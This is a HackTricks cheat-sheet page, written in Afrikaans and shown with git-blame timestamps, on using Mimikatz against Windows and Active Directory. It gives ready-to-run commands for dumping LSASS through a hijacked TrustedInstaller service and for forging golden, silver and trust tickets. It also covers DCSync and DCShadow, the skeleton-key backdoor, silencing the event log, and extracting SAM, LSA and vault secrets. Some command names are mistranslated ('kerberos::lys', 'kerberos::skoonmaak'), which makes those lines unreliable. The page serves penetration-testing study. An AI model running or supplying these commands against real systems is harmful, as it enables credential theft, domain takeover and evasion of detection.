hacktricks/windows-hardening/stealing-credentials/credentials-mimikatz.md

211 lines
11 KiB
Markdown
Raw Normal View History

2022-08-13 23:06:40 +00:00
# Mimikatz
2022-04-28 16:01:33 +00:00
<details>
2024-02-11 02:07:06 +00:00
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 02:07:06 +00:00
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
2022-04-28 16:01:33 +00:00
</details>
2024-02-11 02:07:06 +00:00
**Hierdie bladsy is gebaseer op een van [adsecurity.org](https://adsecurity.org/?page\_id=1821)**. Kyk na die oorspronklike vir verdere inligting!
2024-02-11 02:07:06 +00:00
## LM en duidelike teks in geheue
2024-02-11 02:07:06 +00:00
Vanaf Windows 8.1 en Windows Server 2012 R2 is beduidende maatreëls geïmplementeer om teen diefstal van geloofsbriewe te beskerm:
2024-02-11 02:07:06 +00:00
- **LM-hashes en duidelike teks wagwoorde** word nie meer in die geheue gestoor om sekuriteit te verbeter nie. 'n Spesifieke registerinstelling, _HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential"_, moet gekonfigureer word met 'n DWORD-waarde van `0` om Digest-verifikasie uit te skakel, wat verseker dat "duidelike teks" wagwoorde nie in LSASS gekasheer word nie.
2024-02-11 02:07:06 +00:00
- **LSA-beskerming** word ingevoer om die Local Security Authority (LSA) proses teen ongemagtigde geheuelees en kode-inspuiting te beskerm. Dit word bereik deur die LSASS as 'n beskermde proses te merk. Aktivering van LSA-beskerming behels:
1. Wysig die register by _HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa_ deur `RunAsPPL` in te stel as `dword:00000001`.
2. Implementering van 'n Groepbeleidsvoorwerp (GPO) wat hierdie registerverandering afdwing op bestuurde toestelle.
2024-02-11 02:07:06 +00:00
Ten spyte van hierdie beskermings kan gereedskap soos Mimikatz LSA-beskerming omseil deur spesifieke bestuurders te gebruik, alhoewel sulke aksies waarskynlik in gebeurtenislogboeke aangeteken sal word.
2024-02-11 02:07:06 +00:00
### Teenwerkende SeDebugPrivilege-verwydering
2024-02-11 02:07:06 +00:00
Administrateurs het tipies SeDebugPrivilege, wat hulle in staat stel om programme te ontleed. Hierdie voorreg kan beperk word om ongemagtigde geheue-afleidings te voorkom, 'n algemene tegniek wat deur aanvallers gebruik word om geloofsbriewe uit die geheue te onttrek. Selfs met hierdie voorreg verwyder, kan die TrustedInstaller-rekening steeds geheue-afleidings uitvoer deur 'n aangepaste dienskonfigurasie te gebruik:
2024-02-08 03:06:37 +00:00
```bash
sc config TrustedInstaller binPath= "C:\\Users\\Public\\procdump64.exe -accepteula -ma lsass.exe C:\\Users\\Public\\lsass.dmp"
sc start TrustedInstaller
```
2024-02-11 02:07:06 +00:00
Dit maak dit moontlik om die geheue van `lsass.exe` na 'n lêer te dump, wat dan op 'n ander stelsel geanaliseer kan word om geloofsbriewe te onttrek:
```
# privilege::debug
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonpasswords
```
2024-02-11 02:07:06 +00:00
## Mimikatz Opsies
2024-02-11 02:07:06 +00:00
Gebeurtenislog manipulasie in Mimikatz behels twee primêre aksies: die skoonmaak van gebeurtenislogs en die patching van die Gebeurtenisdiens om die log van nuwe gebeure te voorkom. Hieronder is die opdragte vir die uitvoering van hierdie aksies:
2024-02-11 02:07:06 +00:00
#### Skoonmaak van Gebeurtenislogs
2024-02-11 02:07:06 +00:00
- **Opdrag**: Hierdie aksie is daarop gemik om die gebeurtenislogs te verwyder, wat dit moeiliker maak om kwaadwillige aktiwiteite op te spoor.
- Mimikatz bied nie 'n direkte opdrag in sy standaard dokumentasie vir die skoonmaak van gebeurtenislogs direk via sy opdraglyn nie. Gebeurtenislog manipulasie behels egter gewoonlik die gebruik van stelselhulpmiddels of skripte buite Mimikatz om spesifieke logs te skoonmaak (bv. deur PowerShell of Windows Gebeurtenis Kyker te gebruik).
2024-02-11 02:07:06 +00:00
#### Eksperimentele Funksie: Patching van die Gebeurtenisdiens
2024-02-11 02:07:06 +00:00
- **Opdrag**: `event::drop`
- Hierdie eksperimentele opdrag is ontwerp om die gedrag van die Gebeurtenislogdiens te wysig, wat dit effektief verhoed dat nuwe gebeure aangeteken word.
- Voorbeeld: `mimikatz "privilege::debug" "event::drop" exit`
2024-02-11 02:07:06 +00:00
- Die `privilege::debug` opdrag verseker dat Mimikatz met die nodige bevoegdhede werk om stelseldienste te wysig.
- Die `event::drop` opdrag patch dan die Gebeurtenislogdiens.
2024-02-11 02:07:06 +00:00
### Kerberos Kaart Aanvalle
2024-02-11 02:07:06 +00:00
### Skepping van 'n Goue Kaart
2024-02-11 02:07:06 +00:00
'n Goue Kaart maak dit moontlik om domein-wye toegang na te boots. Sleutelopdrag en parameters:
2024-02-11 02:07:06 +00:00
- Opdrag: `kerberos::golden`
2024-02-08 03:06:37 +00:00
- Parameters:
2024-02-11 02:07:06 +00:00
- `/domain`: Die domeinnaam.
- `/sid`: Die domein se Sekuriteitsidentifiseerder (SID).
- `/user`: Die gebruikersnaam om na te boots.
- `/krbtgt`: Die NTLM-hash van die domein se KDC-diensrekening.
- `/ptt`: Spuit die kaart direk in die geheue in.
- `/ticket`: Stoor die kaart vir later gebruik.
Voorbeeld:
2024-02-08 03:06:37 +00:00
```bash
mimikatz "kerberos::golden /user:admin /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:ntlmhash /ptt" exit
```
2024-02-11 02:07:06 +00:00
### Silwerkaart Skepping
2024-02-11 02:07:06 +00:00
Silwerkaarte verleen toegang tot spesifieke dienste. Sleutelopdrag en parameters:
2024-02-11 02:07:06 +00:00
- Opdrag: Soortgelyk aan 'n Goue Kaart, maar teiken spesifieke dienste.
2024-02-08 03:06:37 +00:00
- Parameters:
2024-02-11 02:07:06 +00:00
- `/service`: Die diens wat geteiken moet word (bv. cifs, http).
- Ander parameters soortgelyk aan 'n Goue Kaart.
2024-02-11 02:07:06 +00:00
Voorbeeld:
2024-02-08 03:06:37 +00:00
```bash
mimikatz "kerberos::golden /user:user /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /target:service.example.com /service:cifs /rc4:ntlmhash /ptt" exit
```
2024-02-11 02:07:06 +00:00
### Vertroue-Tiket Skepping
2024-02-11 02:07:06 +00:00
Vertroue-tikette word gebruik om toegang tot hulpbronne oor domeine heen te verkry deur gebruik te maak van vertrouensverhoudings. Sleutelopdrag en parameters:
2024-02-11 02:07:06 +00:00
- Opdrag: Soortgelyk aan 'n Goue Tiket, maar vir vertrouensverhoudings.
2024-02-08 03:06:37 +00:00
- Parameters:
2024-02-11 02:07:06 +00:00
- `/target`: Die volledig gekwalifiseerde domeinnaam van die teiken-domein.
- `/rc4`: Die NTLM-hash vir die vertrouensrekening.
2024-02-11 02:07:06 +00:00
Voorbeeld:
2024-02-08 03:06:37 +00:00
```bash
mimikatz "kerberos::golden /domain:child.example.com /sid:S-1-5-21-123456789-123456789-123456789 /sids:S-1-5-21-987654321-987654321-987654321-519 /rc4:ntlmhash /user:admin /service:krbtgt /target:parent.example.com /ptt" exit
```
2024-02-11 02:07:06 +00:00
### Bykomende Kerberos-opdragte
2024-02-11 02:07:06 +00:00
- **Lys van Kaartjies**:
- Opdrag: `kerberos::lys`
- Lys alle Kerberos-kaartjies vir die huidige gebruikersessie.
2024-02-11 02:07:06 +00:00
- **Stuur die Cache**:
- Opdrag: `kerberos::ptc`
- Spuit Kerberos-kaartjies in vanaf cache-lêers.
- Voorbeeld: `mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit`
2024-02-11 02:07:06 +00:00
- **Stuur die Kaartjie**:
- Opdrag: `kerberos::ptt`
- Maak dit moontlik om 'n Kerberos-kaartjie in 'n ander sessie te gebruik.
- Voorbeeld: `mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit`
2024-02-11 02:07:06 +00:00
- **Skoonmaak van Kaartjies**:
- Opdrag: `kerberos::skoonmaak`
- Maak alle Kerberos-kaartjies skoon uit die sessie.
- Nuttig voordat kaartjie-manipulasie-opdragte gebruik word om konflikte te voorkom.
2024-02-11 02:07:06 +00:00
### Aktiewe Gids-versteuring
2024-02-11 02:07:06 +00:00
- **DCShadow**: Maak 'n masjien tydelik as 'n DC om AD-objekmanipulasie uit te voer.
- `mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit`
2024-02-11 02:07:06 +00:00
- **DCSync**: Boots 'n DC na om wagwoorddata aan te vra.
- `mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit`
2024-02-11 02:07:06 +00:00
### Toegang tot Geldele
2024-02-11 02:07:06 +00:00
- **LSADUMP::LSA**: Haal geldele uit LSA.
- `mimikatz "lsadump::lsa /inject" exit`
2024-02-11 02:07:06 +00:00
- **LSADUMP::NetSync**: Stel 'n DC voor deur 'n rekenaarrekening se wagwoorddata te gebruik.
- *Geen spesifieke opdrag vir NetSync in oorspronklike konteks verskaf nie.*
2024-02-11 02:07:06 +00:00
- **LSADUMP::SAM**: Kry toegang tot die plaaslike SAM-databasis.
- `mimikatz "lsadump::sam" exit`
2024-02-11 02:07:06 +00:00
- **LSADUMP::Secrets**: Ontsleutel geheime wat in die register gestoor word.
- `mimikatz "lsadump::secrets" exit`
2024-02-11 02:07:06 +00:00
- **LSADUMP::SetNTLM**: Stel 'n nuwe NTLM-hash vir 'n gebruiker in.
- `mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit`
2024-02-11 02:07:06 +00:00
- **LSADUMP::Trust**: Kry vertroue-verifikasie-inligting.
- `mimikatz "lsadump::trust" exit`
2024-02-11 02:07:06 +00:00
### Verskeidenhede
2024-02-11 02:07:06 +00:00
- **MISC::Skeleton**: Spuit 'n agterdeur in LSASS op 'n DC.
- `mimikatz "privilege::debug" "misc::skeleton" exit`
2024-02-11 02:07:06 +00:00
### Bevoorregtingverhoging
2024-02-11 02:07:06 +00:00
- **PRIVILEGE::Backup**: Verkry rugsteunregte.
- `mimikatz "privilege::backup" exit`
2024-02-11 02:07:06 +00:00
- **PRIVILEGE::Debug**: Verkry aflynregte.
- `mimikatz "privilege::debug" exit`
2024-02-11 02:07:06 +00:00
### Wagwoordopvraag
2024-02-11 02:07:06 +00:00
- **SEKURLSA::LogonPasswords**: Wys geldele vir aangemelde gebruikers.
- `mimikatz "sekurlsa::logonpasswords" exit`
2024-02-11 02:07:06 +00:00
- **SEKURLSA::Tickets**: Haal Kerberos-kaartjies uit die geheue.
- `mimikatz "sekurlsa::tickets /export" exit`
2024-02-11 02:07:06 +00:00
### Sid- en Tokenmanipulasie
2024-02-11 02:07:06 +00:00
- **SID::add/modify**: Verander SID en SIDHistory.
- Voeg by: `mimikatz "sid::add /user:targetUser /sid:newSid" exit`
- Wysig: *Geen spesifieke opdrag vir wysig in oorspronklike konteks verskaf nie.*
2024-02-11 02:07:06 +00:00
- **TOKEN::Elevate**: Stel tokens voor.
- `mimikatz "token::elevate /domainadmin" exit`
2024-02-11 02:07:06 +00:00
### Terminaaldienste
2024-02-11 02:07:06 +00:00
- **TS::MultiRDP**: Laat verskeie RDP-sessies toe.
- `mimikatz "ts::multirdp" exit`
2024-02-11 02:07:06 +00:00
- **TS::Sessions**: Lys TS/RDP-sessies.
- *Geen spesifieke opdrag vir TS::Sessions in oorspronklike konteks verskaf nie.*
2024-02-11 02:07:06 +00:00
### Kluis
2021-10-26 21:32:15 +00:00
2024-02-11 02:07:06 +00:00
- Haal wagwoorde uit Windows-kluis.
- `mimikatz "vault::cred /patch" exit`
2021-10-26 21:32:15 +00:00
2022-04-28 16:01:33 +00:00
<details>
2024-02-11 02:07:06 +00:00
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 02:07:06 +00:00
* Werk jy in 'n **cybersekuriteitsmaatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien vir die** [**hacktricks-repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-repo**](https://github.com/carlospolop/hacktricks-cloud).
2022-04-28 16:01:33 +00:00
</details>